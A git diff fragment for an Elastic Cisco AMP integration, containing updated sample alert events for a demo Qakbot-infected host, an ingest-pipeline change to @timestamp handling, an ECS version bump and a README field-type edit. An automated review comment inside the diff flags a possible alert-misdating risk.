 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine",
@@ -3895,7 +3895,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -3919,7 +3919,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:32:23.854077773Z",
+ "ingested": "2021-09-13T18:07:55.452628302Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
diff --git a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index 8d326db7306..0deeae80697 100644
--- a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -16,11 +16,6 @@ processors:
 field: json.data
 target_field: cisco.amp
 ignore_missing: true
-- remove:
- field:
- - "@timestamp"
- ignore_missing: true
- if: ctx?.cisco?.amp?.timestamp != null
 - date:
 field: cisco.amp.timestamp
 formats:
@@ -35,7 +30,7 @@ processors:
 value: '{{_ingest.timestamp}}'
 - set:
 field: ecs.version
- value: '1.11.0'
+ value: '1.12.0'
 - set:
 field: event.kind
 value: alert
diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_amp/docs/README.md
index 4a510396534..334ebbae376 100644
--- a/packages/cisco_amp/docs/README.md
+++ b/packages/cisco_amp/docs/README.md
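Review bot: Dropping the conditional `remove` of `@timestamp` in the `@@ -16,11 +16,6 @@` hunk makes the following `date` processor the only thing that replaces the collector-assigned `@timestamp` for events that carry `cisco.amp.timestamp`, and the rest of that processor (its `target_field`, any `on_failure` or `ignore_failure`) lies outside the hunk, so the failure path cannot be confirmed here. Previously an unparseable `cisco.amp.timestamp` left the document without an `@timestamp` and the problem surfaced at index time; if the `date` processor tolerates failures, the alert would now be indexed silently with the ingest-time `@timestamp` instead of the detection time, which misdates it in an incident timeline. Worth a comment on the `date` entry such as `# Sole writer of @timestamp when cisco.amp.timestamp is present (the earlier conditional remove was dropped); a parse failure must not silently leave the collector's timestamp` and a pipeline test fixture with a malformed `cisco.amp.timestamp` to pin the intended outcome. The `processors` list continues outside the hunk.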
@@ -181,7 +181,7 @@ An example event for `log` looks as following:
 | destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
 | destination.port | Port of the destination. | long |
 | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
-| error.message | Error message. | text |
+| error.message | Error message. | match_only_text |
 | event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
 | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
 | event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword |